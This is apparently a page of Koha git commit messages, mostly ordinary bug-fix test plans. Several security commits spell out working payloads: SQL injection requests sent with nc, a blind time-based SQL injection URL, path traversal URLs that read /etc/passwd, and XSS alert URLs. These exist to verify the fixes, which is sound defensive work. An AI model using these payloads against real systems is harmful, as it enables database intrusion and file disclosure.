git.koha-community.org Git

Bug 14401: Zebra index configuration doesn't allow exact search for C.

2 lines in the Zebra configuration files prevent an exact search for C.,
while all other [A-Z]. searches work correctly.

After taking a look at the  /etc/zebradb/etc/word-phrase-utf.chr
those 2 lines cause the problem:

map (^c\.)          @
map (^C\.)          @

I propose to remove them.

To test:
- Catalog a record with an item with callnumber: C.
- Catalog a record with an item with callnumber: B.
- Try seaching for the second using callnum,ext:B. (exact field search)
  - Verify search works.
- Try searching for the other with callnum,ext:C.
  - Verify no result.
- Apply the patch - copy the zebra config file if necessary into the right spot
- Reindex
- Repeat searches - both should not bring up the correct record.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14422: Typo in updatedatabase.pl

TEST PLAN
---------
1) backup db
2) git checkout -b my_3.6.x origin/3.6.x
3) drop db and create blank one
4) git reset --hard origin/3.6.x
5) run web installer
6) set HomeorHoldingBranchReturn system preference to 'holdingbranch'.
7) create a Default checkout, hold rule
    home -> koha administration -> Circulation and fines rules
    -- I put 10 checkouts total and clicked 'Save'
    -- there currently is not 'returnbranch' in default_circ_rules.
8) git reset --hard origin/3.20.x
    -- or whatever version you apply this to
       (3.8.x, 3.10.x, 3.14.x, 3.16.x, 3.18.x, or 3.20.x
        -- 3.21.00.008 deletes the systempreference involved)
9) ./installer/data/mysql/updatedatabase.pl
10) check HomeorHoldingBranchReturn systempreference
    -- Currently says 'holdingbranch', but
       the value of 'returnbranch' in default_circ_rules is
       'homebranch'.
11) repeat steps 3-8
12) apply this patch
13) repeat steps 9-10
    -- Currently says 'holdingbranch', and
       the value of 'returnbranch' in default_circ_rules is
       'holdingbranch'.
14) run koha qa test tools

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested using 3.6.x install, updated to 3.8.x
Value is preserved
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Note: I haven't followed the test plan, but the fix is trivial.
Maybe it could worth to upate 3.21.00.008 and check the value of
HomeOrHoldingBranchReturn before deleting it.
We could raise a warning if HomeOrHoldingBranchReturn ==
'holdingbranch'.
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set sysopref OpacStarRatings to 'results and details'
- Disable Javascipt on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Loggout from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the loggin page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit f1acb5615d0cbcba5db5b84e12fbad3d41454347)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
(cherry picked from commit 3d8af819a84847b35ad08e62ba137d3febd878dd)

Conflicts:
opac/opac-ratings.pl

Signed-off-by: Liz <wizzyrea@gmail.com>
Conflicts:
opac/opac-ratings.pl

Bug 14421: Corrected example in SMS.pm to working version with hashref.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Test:
1) Apply patch
2) perldoc C4/SMS.pm
3) Check fixed argument in example

Argument is hashref, POD is now right
Added additional space on second arg
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14215: Change the 'delimiter' syspref description for its wider use

Patch changes 'report files' to 'CSV files' as there are more
options now for downloading and creating CSV files where this
preference is taken into account.

To test:
- Verify the changed system preference description for
'delimiter' is correct.

Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 10866: Hide patron's history if intranetreadinghistory is set to not allow

If set to "not allow", the intranetreadinghistory pref prevent staff
members to access patron's checkout history.
But:
1/ The page is still accessible if you know the url
2/ The history can be consulted on the item history page

Test plan:
0/ Don't apply this patch
1/ Set the intranetreadinghistory to allow
2/ Go on a patron's checkout history page
3/ Open a new tab and go on a item's checkout history page
4/ Set the intranetreadinghistory to not allow
5/ Refresh both pages => no change
6/ Apply this patch
7/ Refresh both page.
On the first page, you should see a warning
On the other one, you should see that the patron column is not displayed
anymore.

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13427: jQuery Timepicker is not translated on returns page

The returns page was missing an include with the translated strings.

To test:
- Install an additional language, like de-DE
- Confirm the bug on the returns page
- Make sure SpecifyReturnDate is activated
- Open the datepicker, look at the time settings
- Apply the patch
- Reinstall the language, no update of the po files is needed
- Retest
- Verify, that now the time settings are translated

Signed-off-by: Josef Moravec <josef.moravec@gmail.com>
Works as expected

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set sysopref OpacStarRatings to 'results and details'
- Disable Javascipt on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Loggout from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the loggin page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
Conflicts:
opac/opac-ratings.pl

Bug 14440: get_template_and_user can not have an empty template_name (quote*_ajax.pl)

This patch uses check_api_auth instead of get_template_and_user.

Test plan:
Confirm that you are still able to access to the quote editor with the
edit_quotes permission.
Confirm that you are not if you don't have the permission.

wget your_url/cgi-bin/koha/tools/quotes/quotes_ajax.pl
should return "403 : Forbidden."

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>

Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set sysopref OpacStarRatings to 'results and details'
- Disable Javascipt on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Loggout from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the loggin page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14440: get_template_and_user can not have an empty template_name (updatesupplier.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects acqui/updatesupplier.pl

Test plan :
- Apply patch
- Connect to intranet with a user having "vendors_manage" permission
- Go to acquisition module
- Create a new vendor
- Click on "Edit vendor"
- Change some information and save
=> Your change is saved
- Connect to intranet with a user not having "vendors_manage" permission
- Try to access <intranet>/cgi-bin/koha/acqui/updatesupplier.pl
=> Access is denied
- Disconnect from intranet
- Try to access <intranet>/cgi-bin/koha/acqui/updatesupplier.pl
=> Access is denied

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 8686: Raise required version of URI::Escape to 3.31

Raises the minimum required version of URI::Escape from
1.36 to 3.31.

TEST PLAN
---------
1) git branch -b bug_8686 origin/master
2) ./koha_perl_deps.pl -a | grep URI
   -- it will list 1.36 required
3) git bz apply 8686
4) ./koha_perl_deps.pl -a | grep URI
   -- it will list 3.31 required
5) koha qa test tools

NOTE: Also default in Ubuntu 14.04 LTS,
      not just Wheezy as noted in comment #15.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signoff based on Nicole's comment (bug 9990 comment 6):
"This stops happening if you upgrade URI::Escape to
3.31.  We should make it clear in the Perl Modules page that an upgrade
is needed."
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14426: Escape or use placeholders for sql parameters

Does this patch enough to prevent sql injection in borrowers_out.pl?

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')"
| nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')"
| nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a"
| nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b"
| nc testbox 9002

====================================================================

Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 10355: paramater 'object' lost on the road

Test plan:
1) Go to any detail page in staff
2) Click on the modification log tab
3) Verify, that the object is prefilled with the records biblionumber
and you can also see it as parameter in the url
4) Click a second time on modification log to reset your search

Before this patch, the object parameter was empty.
It now contains the value of the biblionumber.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Work as described, no koha-qa errors

http://bugs.koha-community.org/show_bug.cgi?id=10335

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
(cherry picked from commit 0002126a2ab0ac38a8d3f144f446dc3ba69dab59)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Signed-off-by: Liz Rea <wizzyrea@gmail.com>
Conflicts:
tools/viewlog.pl

Bug 11790: Remove dependency C4::Context from C4::Charset

C4::Context is only used to retrieve a syspref value.
This patch moves the use of C4::Context to a require.

Test plan:
Try to reach the SetMarcUnicodeFlag subroutine (batchmod, add/update a biblio, etc.)

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested on French UNIMARC install
No errors adding/editing biblios
No koha-qa errors

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14329: Useless copy/pasta from Template::Plugin::HtmlToText

The synopsis of this TT plugin contains two example lines:
[% myhtml FILTER html2text(leftmargin => 0, rightmargin => 0) %]
[% myhtmltext | html2text %]

These lines have been copied (without too much thought :) to a few templates. Since we do no use the variables myhtml or myhtmltext in these templates, these lines are useless.

Test plan:
[1] Put some items in your cart. And send it.
[2] Send a shelf.
[3] Git grep on myhtml. Should not have results.

NOTE: Sent carts and lists in Intranet and OPAC successfully.
      Though, this does bring into question why the letters
      have HTML formatting if it is getting removed. That,
      however, is beyond the scope of this bug.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14276: Keep highlight on the active item in item editor

The highlight only works on even items.
This patch should resolve it.

Test plan:
Edit biblio with multiple items.
Verify that the highlight is visible on the selected item you edit.
And that there is no highlight for a new item.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14173: Paging on 'recent comments' page in OPAC is not displaying correctly

This patch corrects the display of current page on
a multipage recent comments.

To test:
1) Enable OpacShowRecentComments

2) Add multiple comments to multiple records
I used a script to add multiple lines like
"insert into reviews values ($i, 51, $i, 'Comment $i', 1, '2015-06-01 00:00:00')"
to table reviews

3) On OPAC, go to 'Recent comments', verify the bug

4) Apply the patch

5) Reload and check correct display

Can't found missing space near 'by' from description.
Display is correct for me.

Followed test plan, displays as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 11929: patron modification error shows borrowernumber

If an error occurs in patron batch modification, a message similar to the following is displayed:
Can not update patron with borrowernumber 7055

It would be useful to have the cardnumber as well.

This patch adds the card number to the lists of errors.

It is not easy to trigger an error (see comments).
For testing, I tweaked the sub ModMember in C4/Members.pm to always return false.

TEST PLAN
---------
1) Log in as a superlibrarian and create a test user
2) Change the cardnumber to a number differing from the
   borrower number.
3) Home -> Tools -> Batch patron modification
4) Type in the cardnumber of that test user
5) Check the Library checkbox.
6) Click Save
   -- nice error, but it is borrower number instead of
      the card number which was entered.
7) Apply the patch
8) Repeat steps 3-6
   -- nice error, but it is now more informative.
9) run koha qa test tools.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
(cherry picked from commit 3b3f82de377c87f9108bf07dd0d293182e5b9bdc)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Liz Rea <wizzyrea@gmail.com>

Bug 14266: Trim the email address in the pl script

The original concern of bug 14266 was to provide a compatibility for
<IE9.
But actually we don't need to trim the email address template side.
It will even better to trim it in the perl script, so that the email
will be trimed even if JS is disabled.

Test plan:
1/ Share a list and does not provide any email address
2/ Submit
=> The form is not submited, no alert/message is displayed (same as
before this patch).
3/ Share a list and provide an email address with spaces before and
after
4/ Submit
=> You should receive the email

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Test output compliant with expected test plan outcome.

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Replace trim() with $.trim() in opac-shareshelf.tt

This patch replaces trim() with $.trim() which is supported
in versions of IE older than IE9.

Revised test plan
=================

Before applying patch:

0) Use IE 8 or Document Mode 8 in a newer IE using F12 Developer Tools
1) Set OpacAllowSharingPrivateLists to "Allow" in Global System Preferences
2) Create a private list in the OPAC
3) Add a record to the private list
4) Click "Share" or "Share list" on one of the list screens
5) Type in an email address and click "Send"
6) Note the error in the console log
7) The page should submit

Apply the patch:

7) Hold shift + refresh the browser to update any Javascript cache
8) Try to "Share" the list again
9) Note that the form submit after clicking "Send" and
that there are no errors in the console log

http://bugs.koha-community.org/show_bug.cgi?id=14266

Signed-off-by: Indranil Das Gupta <indradg@gmail.com>
Remarks: Works as per revised test plan
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 12066: New renew page in staff client doesn't record branch in statistics

Test Plan:
1) Apply this patch
2) Renew an item via circ/renew.pl
3) Note the branch code of your logged in library is set as the
branch in the generated statistic line

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested pre and post patch, now branch is saved
No errors

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 13946: Change order status 'Pending' to 'Ordered'

The order status after closing the basket is 'ordered' in the
database, but displays as 'pending' in the staff interface.

As we use 'pending' when you have to review a suggestion, this
clashes in translations and the meaning is different. The patch
renames 'pending' for the order status to 'Ordered' to be more
clear.

To test:
- Verfiy 'Ordered' shows in the pull down on the acq advanced
search and search still works correctly
- Verify the results table also display 'Ordered' as the status

Signed-off-by: Cédric Vita <cedric.vita@dracenie.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14275: Remove CGI::scrolling_list from guided_reports.pl

Remove an instance of CGI::scrolling_list from this file

To test:
1) Go to Reports, Guided report wizard, New SQL report

2) Create a report with some auth value list, e.g.

SELECT surname,firstname FROM borrowers WHERE branchcode=<<Enter patrons library|branches>>

Save

3) Clic on 'Run this report", look at the dropdown, that will be changed

4) Apply the patch

5) Reload, check dropdown and any regression

Followed test plan, works as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14112 - Silence warnings in t/Charset.t

After Jonathan said this was the wrong way to correct the issue,
www.utf8-chartable.de made it clear to me that the \c3\a9 were
missing x's.

TEST PLAN
---------
1) prove t/Charset.t
-- noise
2) apply patch
3) prove t/Charset.t
-- no noise
4) koha qa test tools

Signed-off-by: Aleisha <aleishaamohia@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14203 - Message for non-existent lang removal

A trivial string patch to update the error message displayed to
user if koha-translate is used to attempt removal of a language
that is not installed.

Test plan
=========

1/ attempt to remove a non-existent language by
   <installdir>/debian/scripts/koha-translate --remove <langcode>
2/ it should show "Error: the selected language is not already
   installed."
3/ apply patch
4/ repeat step 1; it should show "Error: the selected language is
   not installed."

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14184: Undefined $term causes noisy warns in C4/CourseReserves.pm

This patch sets $term to be an empty string.

Test plan
=========

1/ enable 'UseCourseReserves' syspref in Circulation preferences
2/ in a terminal, run a `tail -f ` on your instance's opac-error.log
3/ go to the opac, click on 'Course reserve' tab to go to
   opac-course-reserves.pl
4/ notice the warning - "opac-course-reserves.pl: Use of uninitialized
   value $term" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-course-reserves.pl)
7/ page works but the warning in step #4 is no longer logged
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: Testing result match expected test plan output. The QA tests
         pass with "OK" for the commit.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14185: Undefined $limit causes warn in opac/opac-readingrecord.pl

This patch sets $limit to be an empty string.

Test plan
=========

1/ login into the opac using your user account credentials
2/ in a terminal, run a `tail -f ` on your instance's opac-error.log
3/ go back to the opac, click on 'your reading history' tab to go to
   opac-readingrecord.pl
4/ notice the warning - "opac-readingrecord.pl: Use of uninitialized
   value $limit" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-readingrecord.pl)
7/ page works but the warning in step #4 is no longer logged
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: Testing result match expected test plan output. The QA tests
         pass with "OK" for the commit.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14186 [QA Followup]: Undefined $reservedfor causes warn in opac-reserve.pl

This is a followup for Bug 14186 that removes the extraneous tab
char on line 470, so that the patch can clear QA tools.

This patch sets $reservedfor to an empty string.

Test plan
=========

1/ in a terminal, run `tail -f ` on your instance's opac-error.log
2/ go to the opac and search from an item that exists on the Koha
   instance.
3/ Select the title (if more than one title is returned) and click on
   'Place hold' link to go to opac-reserve.pl
4/ notice the warning - "opac-reserve.pl: Use of uninitialized value
   $reservedfor" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-reserve.pl)
7/ page works but the warning in step #4 is no longer thrown up
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: Testing result match expected test plan output. The QA tests
         pass with "OK" for the commit.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14186: Undefined $reservedfor causes warn in opac-reserve.pl

This patch sets $reservedfor to an empty string.

Test plan
=========

1/ in a terminal, run `tail -f ` on your instance's opac-error.log
2/ go to the opac and search from an item that exists on the Koha
   instance.
3/ Select the title (if more than one title is returned) and click on
   'Place hold' link to go to opac-reserve.pl
4/ notice the warning - "opac-reserve.pl: Use of uninitialized value
   $reservedfor" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-reserve.pl)
7/ page works but the warning in step #4 is no longer thrown up
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: The QA test failed - "forbidden pattern: tab char (line 470)".

         Marking this as 'FAILED QA'

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14130: Update columns.def

- Updates columns.def with new columns in items
- Adds some descriptions
- Corrects some existing column descrpitions

To test:
- Read the patch to see what has been changed
- Run the guided report builder for the 'circulation'
module
- Observe changes show up

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Changes show up, no errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14408 (3.16/3.14) regex fix for .tmpl files too

Bug 14408: Allow integers in template paths

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>

Bug 14408: Add tests to get_template_and_user

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14408 Path Traversal error

Counter counter patch
Please test well, including with the null byte %00, this uses a whitelisting to only allow files ending with .tt
and not allowing ../etc

Note the previous patch tries to protect against /etc/passwd
but //etc/passwd is now vulnerable.  I do think a whitelist is safer than trying to do a blacklist

/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search

Are vulnerable

To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
  Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  (You may have add more ..%2f or remove them to get the correct path)
  Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found

Repeat for the other script also

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Revert "Bug 14408 Path traversal vulnerability"

This reverts commit 0b7647eff31c85d8f7e1e5a50fd82d3b94eec816.

Revert "Bug 14408: Add tests to get_template_and_user"

This reverts commit e8a3febfe7050870116db0512e1a39690a72346c.

update notes

Bumping DB version for 3.16.12

Add release notes for 3.16.12

Translation updates for Koha 3.16.12 release

Bengali files renamed, ben -> bn-IN

Bug 14423 : Multiple XSS bugs in suggestion.pl

To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/suggestion/suggestion.pl?author=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&accepteddate_to=
2/ Notice alert box(es)
3/ Apply patch
4/ Reload and notice alert is gone

Repeat for
collection_title
copyrightdate
isbn
manageddate_from
manageddate_to
publishercode
suggesteddate_from
suggesteddate_to

Bug 14423 : Multiple XSS vulnerabilities in serials-search

To test

1/ Hit a url like http://localhost:8081/cgi-bin/koha/serials/serials-search.pl?bookseller_filter=%22%22%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&searched=1&title_filter=
2/ Notice alert boxes
3/ Apply patch
4/ Reload, notice fixed

Repeat for
callnumber_filter
EAN_filter
ISSN_filter
publisher_filter
title_filter

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14423 : XSS bugs in catalogue search

To test

1/ hit a url like http://localhost:8081/cgi-bin/koha/catalogue/search.pl?limit=%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice alert boxes
3/ Apply patch
4/ Reload url, no alerts
5/ Check search still works

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14423 : XSS issues in marc_subfields_structure

1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/marc_subfields_structure.pl?op=add_form&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice all the alert boxes
3/ Apply patch
4/ Reload page, no more alerts
5/ Test functionality still works

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14423 XSS bug in auth_subfields_structure

1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/auth_subfields_structure.pl?op=add_form&authtypecode=%27%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice a ton of alert boxes pop up
3/ Apply patch
4/ Reload url, no longer get any alerts
5/ Test fuctionality still works

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14423 : XSS bug in lateorders

1/ hit a url like http://localhost:8081/cgi-bin/koha/acqui/lateorders.pl?delay=<script>alert('oh noes')</script>&estimateddeliverydatefrom
2/ Not you get an alert box
3/ Apply patch notice it is fixed
4/ Test functionality still works

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14423 : XSS in authorities-home

To test:
1/ Hit a url like http://localhost:8081/cgi-bin/koha/authorities/authorities-home.pl?op=do_search&type=intranet&marclist=mainentry&and_or=and&operator=contains&value=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice you get 3 alert boxes
3/ Apply patch
4/ Hit the url again, no js

Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14412 : SQL injection possible

There is a SQL Injection vulnerability in the
/cgi-bin/koha/opac-tags_subject.pl script.

By manipulating the variable 'number', the database can be accessed
via time-based blind injections.

The following string serves as an example:

/cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)

To exploit the vulnerability, no authentication is needed

To test
1/ Turn on mysql query logging
2/ Hit /cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
3/ Check the logs notice something like
  SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1
  PROCEDURE ANALYSE
  (EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
4/ Apply patch
5/ Hit the url again
6/ Notice the log now only has
   SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed the problem and the fix for it.
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14408: Add tests to get_template_and_user

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>

Bug 14408 Path traversal vulnerability

/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search

Are vulnerable

To test:
